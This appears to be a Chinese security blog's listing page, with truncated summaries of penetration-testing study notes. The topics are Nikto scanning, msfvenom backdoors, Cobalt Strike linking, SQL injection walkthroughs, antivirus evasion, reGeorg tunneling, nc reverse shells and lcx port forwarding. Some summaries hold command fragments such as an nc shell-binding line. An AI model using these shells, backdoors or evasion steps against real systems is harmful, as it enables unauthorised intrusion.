摘要: Nikto是Kali下著名的web漏洞扫描神器,支持xss sql注入 web目录爬行 敏感目录 信息收集等常用的web漏洞的扫描和发现。 优势 纯主动 识别软件版本 存在安全隐患的文件 配置漏洞 web应用安全隐患 避免404误判 使用 插件:nikto list plugins 避免404误判功 阅读全文
posted @ 2020-02-02 01:38 SinkingStar 阅读(435) 评论(0) 推荐(0)
摘要: 0x034 MSF 启动msf msfconsole 先启动msf依赖的postgresql数据库 初始化数据库 msfdb init (要用普通用户) msf路径 /usr/share 制作后门 msfvenom msfvenom p payload脚本 lhost=监听/攻击机ip lport= 阅读全文
posted @ 2020-02-02 01:36 SinkingStar 阅读(945) 评论(0) 推荐(0)
摘要: 今天更个技能路线图 多想 多做 少说 沉淀 忌浮躁 阅读全文
posted @ 2020-01-31 02:02 SinkingStar 阅读(181) 评论(0) 推荐(0)
摘要: 今天年初六 MSF和cs联动 msf连接cs 1.在队伍服务器上启动cs服务端 ./teamserver 团队服务器ip 连接密码 2.cs客户端连接攻击机 填团队服务器ip和密码,名字随便 msf将session发往cs客户端 1.cs设置监听 监听器 add 选择payload类型和填攻击机ip 阅读全文
posted @ 2020-01-30 00:01 SinkingStar 阅读(2780) 评论(0) 推荐(0)
摘要:  1 判断查询列数 2 判断显示位 添加过狗参数 3 查询库名 4 查询表名 5 查第一个flag值 6 查询列名 7 查看用户名和密码 8 密码md5解密 9 用工具扫一下后台路径 10 还扫到了一个重装漏洞 11 登陆进后台 12 寻找上传点并上马,用burpsuit改包,使form data 阅读全文
posted @ 2020-01-29 22:41 SinkingStar 阅读(330) 评论(0) 推荐(0)
摘要: 年初五 财神入 第一关 联合注入 1.准备 2.加'截断 3.order by 判断查询列数 4.同上 5.联合查询判断字段位置 6.查数据库名 7.1 查表名 7.2 查列名 8.查数据 第二关 不需要单引号截断,查询代码用了整数值 其余与第一关相同 第三关 说明用了(' ')结构 换成')即可 阅读全文
posted @ 2020-01-29 02:22 SinkingStar 阅读(290) 评论(0) 推荐(0)
摘要: 年初四 免杀 msfvenom encoder e 编码器 i 编码次数 多次编码 花指令 bad chars b '\x00' the backdoor factory upx 加壳 少用,基本能识别 .net壳 分离免杀 shellcode提取,动态加载 阅读全文
posted @ 2020-01-28 02:25 SinkingStar 阅读(277) 评论(0) 推荐(0)
摘要: 年初三 跨边界代理 reGeorg 1.python2 安装 urllib3 库 2.上传tunnel.nosocket.php代理脚本到目标机器web路径下 3.访问该文件确认能够执行 4.python2执行主程序reGeorgSocksProxy.py,连接代理脚本 python reGeorg 阅读全文
posted @ 2020-01-27 01:49 SinkingStar 阅读(247) 评论(0) 推荐(0)
摘要: 从我的思维导图笔记里导出来的,可能看起来不太直观,有时间再补点示例图 反弹shell /bin目录下带sh的都是shell nc 1.正向连接,目标机监听自身端口,攻击机主动建立连接 目标机:nc lvvp 端口 e /bin/bash ( e cmd.exe) 攻击机:nc vv 目标IP 监听端 阅读全文
posted @ 2020-01-25 02:22 SinkingStar 阅读(598) 评论(0) 推荐(0)
摘要: 跨边界转发 端口转发 lcx 流程 目标机 ./lcx slave 跳板机ip 监听的端口 127.0.0.1 要转发的端口 跳板机(公网) ./lcx listen 监听的端口 转发给攻击机访问的端口 攻击机 访问跳板机特定端口,即可访问到目标机特定端口 tran参数 如果某端口设置为不可访问,用 阅读全文
posted @ 2020-01-24 02:16 SinkingStar 阅读(302) 评论(0) 推荐(0)